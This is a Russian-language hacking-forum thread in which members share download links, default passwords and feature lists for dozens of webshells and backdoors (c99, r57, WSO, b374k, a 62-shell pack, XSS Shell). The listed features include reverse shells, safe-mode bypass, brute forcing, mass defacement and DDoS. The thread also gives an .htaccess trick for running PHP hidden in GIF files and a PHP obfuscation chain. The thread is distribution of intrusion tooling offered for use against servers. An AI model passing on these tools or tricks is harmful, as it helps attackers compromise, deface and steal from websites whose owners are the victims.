Коллекция шеллов

Discussion in 'Инструменты' started by HIMIKAT, 10 Dec 2010.

  1. HIMIKAT

    HIMIKAT Elder - Старейшина

    Joined:
    12 Jan 2007
    Messages:
    2,707
    Likes Received:
    581
    Reputations:
    403
    Antichat shell


    [​IMG]

    Шелл от Российских программистов Grinay Go0o$E и Isis.
    Функции:
    [~] Выполнение комманд
    [~] Файл-менеджер
    [~] MD5-ломалка
    [~] Mysql dumper
    [~] PHP eval()

    Скачать:
    http://www.sendspace.com/file/zcjgly

    C99 Shell


    [​IMG]

    Один из самых популярных вебшеллов.
    Функции:
    [~] Выполнение комманд
    [~] Файл-менеджер
    [~] Онлайн encoder\decoder
    [~] Bidshell\Backconnect
    [~] PHP eval()
    [~] FTP Bruteforce
    [~] SQL Manager

    Скачать:
    http://www.sendspace.com/file/v4fbz5

    CIH.[ms] Webshell

    [​IMG]

    Симпатичный шелл от российской комманды CIH.[ms] !
    Функции:
    [~] Выполнение комманд
    [~] PHP eval()
    [~] File-Manager[/color]
    [~] SQL Manager

    Скачать:
    http://www.sendspace.com/file/0toeda

    MySQL Webshell

    [​IMG]

    MySQL Shell с достаточно непривычным интерфейсом.
    Радует небольшой размер скрипта.

    Скачать:
    http://www.sendspace.com/file/ldo7ee

    Loader'z WEB shell

    [​IMG]

    Шелл от Pro-Hack.ru.
    Функции:
    [~] Выполнение комманд
    [~] Файл-менеджер
    [~] Bidshell\Backconnect

    Скачать:
    http://www.sendspace.com/file/sp7bm1

    R57Shell (1.4.0 & 1.4.2)

    [​IMG]

    Легендарный вебшелл, который не нуждается в представлении =)
    Функции:
    [~] Выполнение комманд
    [~] Файл-менеджер
    [~] Обход Safe Mode
    [~] Онлайн encoder\decoder
    [~] Bidshell\Backconnect
    [~] PHP eval()
    [~] FTP Bruteforce
    [~] Поиск и шаблоны важных команд
    [~] SQL Exec
    [~] Mail
    [~] Dos

    Скачать (1.4.0):
    http://www.sendspace.com/file/68mg47
    Скачать (1.4.2):
    http://www.sendspace.com/file/fgms3n
    Скачать (ly0kha edition):
    http://www.sendspace.com/file/8ebpsz

    Remview (Fixed by Art Of Hack)

    [​IMG]

    Шелл с очень красивым и удобным интерфейсом!
    В этой версии исправены некоторые баги, а так же добавлена полная совместимость с новыми версиями PHP.
    Функции:
    [~] Выполнение комманд
    [~] Файл-менеджер
    [~] PHP eval()
    [~] MD5 Cracker
    [~] Online encoder\decoder

    Скачать:
    http://www.sendspace.com/file/oycc4k

    R57Sql 2.01 (Modified by ArtOfHack)

    [​IMG]

    Новая версия очень удобного SQL-менеджера, с приятным и понятным интерфейсом, напоминающим PHPMyAdmin. Скрипт сочетает в себе небольшой размер и отличный функционал. Но к большому сожалению обновления не выходили уже несколько лет, и из-за этого скрипт перестал рабоать на новых версиях PHP. Эта версия полностью совместима с новыми версиями PHP. Так же были исправлены несколько багов.

    Скачать:
    http://www.sendspace.com/file/pm2bzw

    WSO2.4 Webshell

    [​IMG]

    Отличный шелл от российских разработчиков.
    Функции:
    [~] Выполнение комманд
    [~] Файл-менеджер
    [~] Обход Safe Mode
    [~] PHP eval()
    [~] FTP Bruteforce
    [~] Поиск и шаблоны важных команд
    [~] SQL Manager

    password:root

    Скачать:
    http://www.sendspace.com/file/gyi0yf

    PPS 1.0 perl-cgi web shell

    [​IMG]

    Шел от Pashkela
    Функции:
    [~] Авторизация
    [~] SystemInfo
    [~] Листинг, загрузка, скачка, выполнение команд,просмотр файлов, редактирование файлов, chmod+touch+zip+unzip+delete папок/файлов в один клик
    [~] Консоль
    [~] phpMyAdmin на perl - пока только MySql (возможность отмечать несколько колонок для запроса)
    [~] Бекконект
    [~] Выполнение perl-кода из формы (eval)
    [~] Logout
    [~] Самоудаление
    [~] Работа через POST

    Default password: root

    Скачать:
    http://www.sendspace.com/file/cdlkqc

    [Python]CGI shell

    [​IMG]

    Автор шела oRb
    Функции:
    [~] работа с файлами и папками
    [~] выполнение команд
    [~] Bind port to /bin/sh
    [~] Back-connect
    [~] работают без создания каких-либо файлов в /tmp за счет fork'a

    Default password: root

    Скачать:
    http://www.sendspace.com/file/065345

    MySQL RST/GHC Manager 2.3

    [​IMG]

    Мод известного SQL-мэнеджера от участников antichat.ru

    Скачать:
    http://www.sendspace.com/file/q1s4cb

    rgod`s webshell

    [​IMG]

    Шелл от rgod. Скрипт обладает огромным функционалом, хоть и написан достаточно давно, о сих пор актуален. Для тех кто не в курсе rgod - известный итальянский хакер, нашедший огромное количество уязвимостей в различных PHP движках. rgod скончался в 2008 году от редкой болезни. Вечная память.

    Скачать:
    http://www.sendspace.com/file/fpyrt6

    b0ff Web Shell 1.0


    [​IMG]

    Переделанный WSO. Особых отличий я не заметил.

    Password: boff

    Скачать:
    http://www.sendspace.com/file/q6jr17

    ZanDoboY Private Shell 1.5 06.2010


    [​IMG]

    Скачать:
    http://www.sendspace.com/file/o37dkp
     
  2. HIMIKAT

    HIMIKAT Elder - Старейшина

    Joined:
    12 Jan 2007
    Messages:
    2,707
    Likes Received:
    581
    Reputations:
    403
    P.A.S. v.2.0


    [​IMG]

    Web-Shell написанный на PHP с нуля.
    Функции:
    Файловый менеджер:
    [~] Удаление/перемещение/переименование/копирование/создание/скачка файлов и папок;
    [~] Загрузка файлов;
    [~] Просмотр и правка файлов;
    [~] Поиск с опциями и использованием preg_match;
    [~] Сортировка списка файлов;
    Выполнение команд:
    [~] Eval;
    [~] Exec ( с попыткой использования альтернатив при отключении );
    MySQL менеджер:
    [~] Просмотр списка БД и таблиц;
    [~] Корректный просмотр содержимого таблиц;
    [~] Дамп/очистка/удаление БД и таблиц (любых размеров);
    [~] Выполнение запросов с отображением результатов;
    Информация о сервере:
    [~] PHPInfo;
    [~] Настройки Apach;
    [~] hosts (win);
    [~] sam (win);
    Процессы:
    [~] Просмотр;
    [~] Возможность попытки завершить процесс;
    Утилиты:
    [~] FTP чекер;
    [~] FTP брутер (по словарю/грубый, сохранение/отправка результатов на мыло);
    [~] MySQL брутер (по словарю/грубый, сохранение/отправка результатов на мыло);
    [~] Hash брутер (любой алгоритм, по словарю/грубый, сохранение/отправка результатов на мыло);
    [~] Отправка почты;

    [+] обход safe-mode;
    [+] поддержка MSSQL и PostgreSQL;
    [+] чекер Mail и Proxy;
    [+] брут MSSQL, PostgreSQL, Mail (POP3) сразу списком;
    [+] Perl Back-connect/Bind Port;
    [+] шифрование шелла, для c00kie авторизации, по указанному логину и паролю (без использования eval);
    [-] процессы;

    Login:admin; password:admin

    Инфо:
    Скрипт распространяется по лицензии "Beerware".
    Не использует JS, GET.
    Никаких картинок.
    Basic авотризация.
    Размер : 20 KB

    Скачать:
    http://www.sendspace.com/file/dqdcx5

    Shell c102, RooT CraCkeR


    [​IMG]

    Скачать:
    http://www.sendspace.com/file/e3bj9c

    shell in gif

    В .htaccess нужно будет внести следующее:
    AddType application/x-httpd-php .gif

    Скачать:
    http://www.sendspace.com/file/wcnzte

    SyRiAn Sh3ll V2


    [​IMG]

    user:root;password:toor

    [​IMG] [​IMG]

    Скачать:
    http://www.sendspace.com/file/gga90o

    Пак на 62 шелла

    Список:
    1. Ajax Command Shell
    2. Antichat Shell v1.3
    3. Arab Shell
    4. Aspx Shell
    5. Avent Group
    6. Ayyildiz Tim Shell
    7. aZRaiL Php v1.0
    8. b64 Shell
    9. Backdoor v1.0
    10. Backdoor by z0mbie
    11. BackDoor FR
    12. c99 Shell
    13. c100 Shell
    14. Cyber Shell (v 1.0)
    15. datacha0s Shell
    16. dC3 Security Crew Shell PRiV
    17. Dive Shell 1.0 - Emperor Hacking Team
    18. Dive Shell
    19. Doom Tool v2.0
    20. Dtool Pro
    21. Dx Shell v1.0
    22. ekin0x
    23. Elmali Seker Backd00r
    24. Erne Shell
    25. Fatal Shell
    26. GFS web-shell ver 3.1.7 - PRiV8
    27. Hantu Shell
    28. Heykir Shell
    29. Infektion Shell
    30. Iron Shell
    31. Jsp Webshell 1.2
    32. Kadot Universal Shell v0.1.6
    33. Lama Shell
    34. Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit
    35. Macker's Private PHPShell
    36. Mysql interface v1.0
    37. MySQL Web Interface Version 0.8
    38. n3t Shell
    39. NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version
    40. Onboom Shell
    41. Perl Web Shell by RST-GHC
    42. PhP Injection Shell
    43. Php Shell
    44. Private-i3lue
    45. s72 Shell v1.1 Coding
    46. safe0ver Shell
    47. Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2
    48. SimAttacker - Vrsion 1.0.0 - priv8 4 My Friend
    49. SimShell 1.0 - Simorgh Security MGZ
    50. Sniper Shell
    51. Ver Shell
    52. Web Admin Shell
    53. Web Shell
    54. WinX Shell
    55. c99 Cybernetic Edition
    56. Worse Linux Shell
    57. Grot Php Shell v1.2
    58. c99_locus7s
    59. Crystal Shell
    60. Efso2.asp
    61. r57
    62. Safeover Shell

    Скачать:
    http://www.sendspace.com/file/mb5g2h
    Скачать одним архивом:
    http://www.sendspace.com/file/wd1zp0

    (c) материалы предоставлены artofhack.kz & r00tsecurity.org
     
    #2 HIMIKAT, 10 Dec 2010
    Last edited: 10 Dec 2010
    1 person likes this.
  3. HIMIKAT

    HIMIKAT Elder - Старейшина

    Joined:
    12 Jan 2007
    Messages:
    2,707
    Likes Received:
    581
    Reputations:
    403
    Добавил линк на скачку одним архивом.
     
    1 person likes this.
  4. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    1 person likes this.
  5. ubi

    ubi Elder - Старейшина

    Joined:
    25 Dec 2009
    Messages:
    308
    Likes Received:
    76
    Reputations:
    19
    ITSecTeam Shell v2.1

    This shell is developed by ITSecTeam members and it can:

    execute system commands
    execute bypass command
    bypass directory
    connect to common databases like MsSQL, MsSQL, PostgreSQL, Oracle & DB2
    edit files & directories
    and new version features:
    Adding server informaton, php version and safe mode to the top of the shell page for ease of use.
    System drives listing.
    Adding icons to files and folders.
    Opening files with direct link.
    Downloading all of the files and folders of a special folder in zip format without using a specific function.
    Direct downloading a file.
    Maintaining working directory to use of whole site features.
    Adding symlink in 2 ways: using os command line and php abilities.
    Changing string to other formats.
    Mail Boomber.
    Local Crashing of php and apache.
    Dumping databse into sql and gzip format.
    Mass defacing of all folders with write access permission.
    Downloading a file from other servers.
    Performing remote DDoS attack.
    Searching for all writable folders.
    Bypass symlink and Mod security via htaccess and disabling safe mode and disable functions via php.ini if server configured unsuitable.
    Remonving shell automatically.
    Copying a file without using copy function.
    Changing of shell template.
    Removing bugs of former versions.
    Adding event of last activities.
    Disabling magic qoute in runtime.
    and so much more...


    Скачать:

    Download ver 2.1

    Download former ver (1.1)

    Если уже запостили,удалите
     
    #5 ubi, 12 Dec 2010
    Last edited: 12 Dec 2010
  6. HIMIKAT

    HIMIKAT Elder - Старейшина

    Joined:
    12 Jan 2007
    Messages:
    2,707
    Likes Received:
    581
    Reputations:
    403
    XSS Tunnel

    [​IMG]

    Особая прокся, которая позволяет пустить весь HTTP-трафик через Cross-site Scripting (XSS) канал, открытый с помощью XSS-шелла. В архиве представлены как раз последние версии XSS Shell и XSS Tunnel, а также их исходники.

    Скачать:
    http://www.sendspace.com/file/m06iuo
     
    1 person likes this.
  7. HIMIKAT

    HIMIKAT Elder - Старейшина

    Joined:
    12 Jan 2007
    Messages:
    2,707
    Likes Received:
    581
    Reputations:
    403
    WSO Krist_ALL edition

    [​IMG]

    Модификация известного шелла WSO. Автор модификации Krist_ALL решил добавить в шелл большой список функций и изменений, которых ему не хватало в оригинале:

    • удаленная загрузка с сервера [если нет downloader'ов, то поле не показывается вообще, если же есть, то в списке только те, которые присутствуют на сервере]
    • цвет надписей зависит от текущих прав [зеленый - writable, красный - нет прав]
    • теперь всегда перед глазами полезности, опасности и прочая нужная информация [нет необходимости лезть в раздел INFO]
    • поиск эксплойтов на множестве сайтов
    • в списке появилась возможность редактирования файла [выбираем один единственный файл и жмем кнопку]
    • порядок столбцов изменен на более удобный
    • дополнительная информация в разделе INFO
    • каждый параметр с новой строчки
    • автоматически подсвечивается php-код, если ты просматриваешь файл с расширением php
    • убран неработающий milw0rm
    • изменен дизайн
    • добавлена переменная $t [1 - показывает поле авторизации, 2 - не показывает]
    • другие мелкие исправления и дополнения

    Пароль по умолчанию: root
    Скачать:
    http://dl.dropbox.com/u/20490401/WSO-Krist_ALL.rar
     
  8. Gaben7

    Gaben7 Member

    Joined:
    8 Jan 2012
    Messages:
    129
    Likes Received:
    9
    Reputations:
    6
    googlecode.com(Коллекция шеллов)

    http://web-malware-collection.googlecode.com/svn-history/r7/trunk/Backdoors/
     
    #8 Gaben7, 19 May 2012
    Last edited: 19 May 2012
  9. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    404 Private shell By Team ap3x_nd_h4ck0

    Нашел в gooooogle!
    _http://www.google.com.ua/search?q=404+Private+shell+By+Team+ap3x_nd_h4ck0

    Для преобразования в адекватный вид нужно:

    eval(gzinflate(str_rot13(base64_decode

    _http://www.tareeinternet.com/scripts/decrypt.php
     
    #9 Strilo4ka, 22 Sep 2012
    Last edited: 22 Sep 2012
  10. Sharp.Net

    Sharp.Net New Member

    Joined:
    28 Jul 2012
    Messages:
    39
    Likes Received:
    3
    Reputations:
    1
    Авторизация прикольная! а сам шелл тот же всо
     
  11. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    b374k shell 3.2

    https://github.com/b374k/b374k

    [​IMG]
     
    #11 Strilo4ka, 7 Nov 2014
    Last edited: 7 Nov 2014
    3 people like this.
  12. labanec

    labanec New Member

    Joined:
    24 Aug 2016
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    За баян не ругайте сильно. Вот накопал https://github.com/tennc/webshell . Искал b374 mini, накопал склад шеллов.
     
  13. emelin

    emelin New Member

    Joined:
    25 Aug 2016
    Messages:
    6
    Likes Received:
    1
    Reputations:
    1
    С этими шелами с гитхаба надо быть осторожнее.. Пару раз было такое: качаешь шелл, меняешь пароль и заливаешь его на сервер, заходишь на шелл, а он, помимо всего прочего, шлет ip сервера и пароль (хеш) на какой то китайский IP. или тоже, но через JS с клиента.
    Так что мой, совет - проверяйте шелы прежде чем использовать.
     
    labanec likes this.
  14. labanec

    labanec New Member

    Joined:
    24 Aug 2016
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Буду иметь ввиду. Согласен. Халява имеет свою цену. Если чуть оффтопить, то надежное ПО - которое написал сам. Конечно из-за неопытности можно написать палево самому себе. Но вот вопрос возникал, ладно ПХП шеллы, они хоть как то читабельны. А если на компилируем языке написан чужой софт, там же при реверс ижениринге сам рогатый ногу сломит. Спецурам достаточно подослать на портал хоть одного своего програмера и все скачавшие его софт окажутся под колпаком.
     
  15. hiderat

    hiderat New Member

    Joined:
    9 Oct 2016
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Посоветуйте шелл для ASP чтобы на одном файлике был написан
     
  16. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    _________________________
    hiderat likes this.
  17. Soviet[HZ]

    Soviet[HZ] Elder - Старейшина

    Joined:
    20 Jul 2007
    Messages:
    87
    Likes Received:
    40
    Reputations:
    22
    Давно тут не был. Что с сайтом Маднэта случилось?

    p.S>Его шелл помните? Не заметил упоминаний в этом посте. Может кто нибудь выложит?
     
  18. hiderat

    hiderat New Member

    Joined:
    9 Oct 2016
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Чисто на html что нить есть?
     
  19. strelok20094

    strelok20094 Member

    Joined:
    26 Mar 2011
    Messages:
    81
    Likes Received:
    6
    Reputations:
    2
    стандартизированный язык разметки документов
    php код не выполнится, поэтому нет.
     
    hiderat likes this.
  20. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    https://github.com/tennc/webshell/
    раздел php, наличие бекдоров не известно
     
    _________________________